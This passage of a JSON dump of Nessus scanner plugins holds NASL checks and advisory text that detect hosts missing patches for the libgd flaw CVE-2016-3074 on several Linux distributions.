(deb_check(release:\"8.0\", prefix:\"libgd-tools\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd2-noxpm-dev\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd2-xpm-dev\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd3\", reference:\"2.1.0-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:25", "description": "Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-14T00:00:00", "title": "Fedora 22 : gd (2016-7d6cbcadca)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-07-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gd", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-7D6CBCADCA.NASL", "href": "https://www.tenable.com/plugins/nessus/92118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-7d6cbcadca.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92118);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"FEDORA\", value:\"2016-7d6cbcadca\");\n\n script_name(english:\"Fedora 22 : gd (2016-7d6cbcadca)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-7d6cbcadca\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"gd-2.1.1-3.fc22\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:52", "description": "New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-02T00:00:00", "title": "Slackware 14.0 / 14.1 / current : php (SSA:2016-120-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2016-120-02.NASL", "href": "https://www.tenable.com/plugins/nessus/90801", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-120-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90801);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"SSA\", value:\"2016-120-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : php (SSA:2016-120-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.383127\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fc95e1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:05:15", "description": "The remote host is affected by the vulnerability described in GLSA-201607-04\n(GD: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in GD. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-18T00:00:00", "title": "GLSA-201607-04 : GD: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9709", "CVE-2016-3074", "CVE-2014-2497"], "modified": "2016-07-18T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:gd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201607-04.NASL", "href": "https://www.tenable.com/plugins/nessus/92348", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201607-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92348);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-2497\", \"CVE-2014-9709\", \"CVE-2016-3074\");\n script_xref(name:\"GLSA\", value:\"201607-04\");\n\n script_name(english:\"GLSA-201607-04 : GD: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201607-04\n(GD: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in GD. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201607-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All GD users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/gd-2.2.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/gd\", unaffected:make_list(\"ge 2.2.2\"), vulnerable:make_list(\"lt 2.2.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GD\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T09:01:27", "description": "According to the versions of the gd package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - Integer signedness error in GD Graphics Library 2.1.1\n (aka libgd or libgd2) allows remote attackers to cause\n a denial of service (crash) or potentially execute\n arbitrary code via crafted compressed gd2 data, which\n triggers a heap-based buffer overflow.(CVE-2016-3074)\n\n - The output function in gd_gif_out.c in the GD Graphics\n Library (aka libgd) allows remote attackers to cause a\n denial of service (out-of-bounds read) via a crafted\n image.(CVE-2016-6161)\n\n - Stack consumption vulnerability in the\n gdImageFillToBorder function in gd.c in the GD Graphics\n Library (aka libgd) before 2.2.2, as used in PHP before\n 5.6.28 and 7.x before 7.0.13, allows remote attackers\n to cause a denial of service (segmentation violation)\n via a crafted imagefilltoborder call that triggers use\n of a negative color value.(CVE-2016-9933)\n\n - Double free vulnerability in the gdImagePngPtr function\n in libgd2 before 2.2.5 allows remote attackers to cause\n a denial of service via vectors related to a palette\n with no colors.(CVE-2017-6362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-19T00:00:00", "title": "EulerOS 2.0 SP3 : gd (EulerOS-SA-2019-2583)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9933", "CVE-2016-6161", "CVE-2016-3074", "CVE-2017-6362"], "modified": "2019-12-19T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:gd", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2583.NASL", "href": "https://www.tenable.com/plugins/nessus/132300", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132300);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-3074\",\n \"CVE-2016-6161\",\n \"CVE-2016-9933\",\n \"CVE-2017-6362\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : gd (EulerOS-SA-2019-2583)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gd package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - Integer signedness error in GD Graphics Library 2.1.1\n (aka libgd or libgd2) allows remote attackers to cause\n a denial of service (crash) or potentially execute\n arbitrary code via crafted compressed gd2 data, which\n triggers a heap-based buffer overflow.(CVE-2016-3074)\n\n - The output function in gd_gif_out.c in the GD Graphics\n Library (aka libgd) allows remote attackers to cause a\n denial of service (out-of-bounds read) via a crafted\n image.(CVE-2016-6161)\n\n - Stack consumption vulnerability in the\n gdImageFillToBorder function in gd.c in the GD Graphics\n Library (aka libgd) before 2.2.2, as used in PHP before\n 5.6.28 and 7.x before 7.0.13, allows remote attackers\n to cause a denial of service (segmentation violation)\n via a crafted imagefilltoborder call that triggers use\n of a negative color value.(CVE-2016-9933)\n\n - Double free vulnerability in the gdImagePngPtr function\n in libgd2 before 2.2.5 allows remote attackers to cause\n a denial of service via vectors related to a palette\n with no colors.(CVE-2017-6362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2583\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7bb5735\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"gd-2.0.35-26.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:43:42", "description": "It was discovered that the GD library incorrectly handled certain\ncolor tables in XPM images. If a user or automated system were tricked\ninto processing a specially crafted XPM image, an attacker could cause\na denial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-2497)\n\nIt was discovered that the GD library incorrectly handled certain\nmalformed GIF images. If a user or automated system were tricked into\nprocessing a specially crafted GIF image, an attacker could cause a\ndenial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-9709)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageFillToBorder(). A remote attacker could possibly use this\nissue to cause a denial of service. (CVE-2015-8874)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageScaleTwoPass(). A remote attacker could possibly use this\nissue to cause a denial of service. This issue only applied to Ubuntu\n14.04 LTS, Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\nHans Jerry Illikainen discovered that the GD library incorrectly\nhandled certain malformed GD images. If a user or automated system\nwere tricked into processing a specially crafted GD image, an attacker\ncould cause a denial of service or possibly execute arbitrary code.\n(CVE-2016-3074).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-01T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : libgd2 vulnerabilities (USN-2987-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libgd2-noxpm", "p-cpe:/a:canonical:ubuntu_linux:libgd2-xpm", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "p-cpe:/a:canonical:ubuntu_linux:libgd3", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2987-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2987-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91423);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2019/09/18 12:31:45\");\n\n script_cve_id(\"CVE-2014-2497\", \"CVE-2014-9709\", \"CVE-2015-8874\", \"CVE-2015-8877\", \"CVE-2016-3074\");\n script_xref(name:\"USN\", value:\"2987-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : libgd2 vulnerabilities (USN-2987-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the GD library incorrectly handled certain\ncolor tables in XPM images. If a user or automated system were tricked\ninto processing a specially crafted XPM image, an attacker could cause\na denial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-2497)\n\nIt was discovered that the GD library incorrectly handled certain\nmalformed GIF images. If a user or automated system were tricked into\nprocessing a specially crafted GIF image, an attacker could cause a\ndenial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-9709)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageFillToBorder(). A remote attacker could possibly use this\nissue to cause a denial of service. (CVE-2015-8874)\n\nIt was discovered that the GD library incorrectly handled memory when\nusing gdImageScaleTwoPass(). A remote attacker could possibly use this\nissue to cause a denial of service. This issue only applied to Ubuntu\n14.04 LTS, Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\nHans Jerry Illikainen discovered that the GD library incorrectly\nhandled certain malformed GD images. If a user or automated system\nwere tricked into processing a specially crafted GD image, an attacker\ncould cause a denial of service or possibly execute arbitrary code.\n(CVE-2016-3074).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2987-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgd2-noxpm, libgd2-xpm and / or libgd3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgd2-noxpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgd2-xpm\");\n script_set_attribute(attribute:\"cpe\", 